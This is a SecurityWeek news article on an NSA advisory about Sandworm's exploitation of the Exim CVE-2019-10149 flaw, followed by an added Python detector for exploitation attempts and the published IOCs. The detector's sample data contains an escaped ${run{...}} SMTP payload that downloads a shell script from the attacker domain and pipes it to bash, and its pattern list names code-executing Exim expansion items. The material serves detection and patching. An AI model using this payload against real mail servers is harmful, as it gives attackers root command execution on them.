SecurityWeek

Cyberwarfare

NSA Publishes IOCs Associated With Russian Targeting of Exim Servers

The U.S. National Security Agency (NSA) on Thursday published information on the targeting of Exim mail servers by the Russia-linked threat actor known as Sandworm Team.

The open-source Exim mail transfer agent (MTA) is used broadly worldwide: it powers more than half of the Internet's email servers and ships as the default MTA in some Linux distributions, Debian among them. Roughly 500,000 organizations run Exim within their environments.

In June 2019, Exim developers patched CVE-2019-10149, a vulnerability that allows both local and remote attackers to run arbitrary commands as root. Over 3.5 million machines were found to be at risk at the time, and attacks targeting the flaw emerged soon after.

Now, the NSA says Sandworm has been exploiting the vulnerability since at least August 2019 to execute commands and code on affected systems.

“The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA,” the NSA says.

Also tracked as TeleBots, Sandworm Team is focused on cyber-espionage. Its targeting largely overlaps with that of APT28 (also known as Pawn Storm, Fancy Bear, Sofacy, Sednit, Tsar Team and Strontium), but the two groups use different tools and methods.

Sandworm Team, security researchers say, has been targeting European government organizations, media outlets in France and Germany, political opposition groups in Russia, and LGBT organizations with links to Russia. The group was also connected to attacks on Ukraine’s power grid.

In addition, the threat actor is believed to have orchestrated attacks on the 2016 U.S. presidential election, and to be behind the June 2017 NotPetya cyberattack and the VPNFilter botnet.


According to the NSA's advisory, Sandworm Team has been attacking unpatched, Internet-facing Exim MTAs by sending a command in the MAIL FROM field of an SMTP (Simple Mail Transfer Protocol) message. The public analyses of CVE-2019-10149, including the Qualys advisory that disclosed it, trigger the same flaw through the recipient address in RCPT TO: the bug is that Exim passes the envelope address through its string expander during delivery, so an address such as ${run{...}}@localhost executes the embedded command as root.

The attacker varies the parameters of the command per deployment. Successful exploitation results in the victim machine downloading and executing a shell script from a Sandworm-controlled domain.

Since at least August 2019, Sandworm Team has been observed launching these attacks from two IP addresses and one domain: 95.216.13.196, 103.94.157.5, and hostapp(.)be, the NSA explains.

“Update Exim immediately by installing version 4.93 or newer to mitigate this and other vulnerabilities. Other vulnerabilities exist and are likely to be exploited, so the latest fully patched version should be used. Using a previous version of Exim leaves a system vulnerable to exploitation,” the NSA warns.
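Tying together the two actionable parts of the advisory, the exploitation pattern described above and the update guidance just quoted, here is a small Python detector added for this page (it is not code from the NSA, SecurityWeek, or the Exim project). It decodes the backslash escapes Exim's expander accepts, so a payload obfuscated as `\x2fbin\x2fsh` is still matched as `/bin/sh`; it flags `${run{...}}` and similar code-executing expansion items in any log line or captured SMTP command; it matches the NSA-published IPs and domain; and it checks an `exim -bV` version string against the "version 4.93 or newer" recommendation. The log lines and the `exim -bV` output are constructed samples, and the `${run{...}}` payload is modelled on the technique described, not copied from the actor's traffic.

```python
"""Detect CVE-2019-10149 exploitation attempts and the NSA-published Sandworm
IOCs in Exim-related text (mainlog lines or captured SMTP commands), and check
an Exim version against the NSA's "4.93 or newer" guidance.

Added example; not code from the NSA advisory or the Exim project."""
import re

# Indicators the NSA published for this campaign (as listed in the article).
SANDWORM_IPS = {"95.216.13.196", "103.94.157.5"}
SANDWORM_DOMAINS = {"hostapp.be"}

# Exim expansion items that execute code or read local data. ${run{...}} is the
# one used against CVE-2019-10149; the others have no business in an envelope
# address either, so they are flagged for the same reason.
DANGEROUS_ITEMS = ("${run{", "${readfile{", "${readsocket{", "${dlfunc{", "${perl{")

# Backslash escapes understood by Exim's string expansion: \xHH, up to three
# octal digits, \t \n \r, and \<char> for a literal character.
_ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)", re.S)
_RUN_RE = re.compile(r"\$\{run\{(.*?)\}\}", re.S)
_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_VERSION_RE = re.compile(r"Exim version (\d+\.\d+(?:\.\d+)?)")


def decode_exim_escapes(text: str) -> str:
    """Undo Exim escapes so an obfuscated payload such as \\x2fbin\\x2fsh is
    matched as /bin/sh. Legitimate log lines rarely contain backslashes, so
    decoding the whole line is an acceptable trade-off for a detector."""
    def repl(m):
        tok = m.group(1)
        if len(tok) > 1 and tok[0] == "x":
            return chr(int(tok[1:], 16))
        if all(c in "01234567" for c in tok):
            return chr(int(tok, 8))
        return {"t": "\t", "n": "\n", "r": "\r"}.get(tok, tok)
    return _ESCAPE_RE.sub(repl, text)


def scan_line(line: str) -> dict:
    """Return what one line reveals: dangerous expansion items, the decoded
    ${run{...}} command bodies, and any NSA-listed IPs or domains."""
    decoded = decode_exim_escapes(line)
    return {
        "expansion_items": [it for it in DANGEROUS_ITEMS if it in decoded],
        "run_commands": _RUN_RE.findall(decoded),
        "ioc_ips": sorted(ip for ip in set(_IP_RE.findall(decoded)) if ip in SANDWORM_IPS),
        "ioc_domains": sorted(d for d in SANDWORM_DOMAINS if d in decoded.lower()),
    }


def scan_lines(lines):
    """Return [(1-based line number, findings)] for every line with a hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        findings = scan_line(line)
        if any(findings.values()):
            hits.append((n, findings))
    return hits


def parse_exim_version(bv_output: str):
    """Pull the version out of `exim -bV` output, whose first line reads
    'Exim version 4.92 #3 built ...'. Returns None if it is not found."""
    m = _VERSION_RE.search(bv_output)
    return m.group(1) if m else None


def meets_nsa_minimum(version: str, minimum: str = "4.93") -> bool:
    """True if version >= minimum, compared numerically so 4.92.3 < 4.93
    and 4.93.0 == 4.93 (a string compare would get both wrong)."""
    a = tuple(int(p) for p in version.split("."))
    b = tuple(int(p) for p in minimum.split("."))
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


# Constructed sample input (not real log data): a benign mainlog delivery line,
# a connection-log line from an NSA-listed address, and a raw SMTP command
# carrying an escaped ${run{...}} payload in the envelope sender.
SAMPLE_LINES = [
    "2019-08-12 09:00:01 1hxAAA-0000aa-AA <= alice@example.org H=mail.example.org [198.51.100.7] P=esmtp S=2048",
    "2019-08-12 09:05:12 SMTP connection from [95.216.13.196] (TCP/IP connection count = 1)",
    "MAIL FROM:<${run{\\x2fbin\\x2fsh\\t-c\\t\\x22exec\\x20\\x2fusr\\x2fbin\\x2fwget\\x20-O\\x20-\\x20http:\\x2f\\x2fhostapp\\x2ebe\\x2fscript.sh\\x20|\\x20bash\\x22}}@example.net>",
]
# Constructed `exim -bV` first line (version and build date are made up).
SAMPLE_BV = "Exim version 4.92.3 #3 built 04-Jun-2019 10:11:12\n"

if __name__ == "__main__":
    for n, findings in scan_lines(SAMPLE_LINES):
        print(n, findings)
    v = parse_exim_version(SAMPLE_BV)
    print(v, "ok" if v and meets_nsa_minimum(v) else "UPDATE REQUIRED")
```

Run it against `/var/log/exim4/mainlog` (or a packet capture's SMTP commands, one per line) and review every hit: a listed IP with no payload is worth a look on its own, and any decoded `${run{...}}` body tells you exactly what the attacker tried to fetch and execute.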

Related: Russian Hackers Target European Governments Ahead of Elections: FireEye

Related: Hackers Target Recent Vulnerability in Exim Mail Server

Related: NSA: Russian Agents Have Been Hacking Major Email Program

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
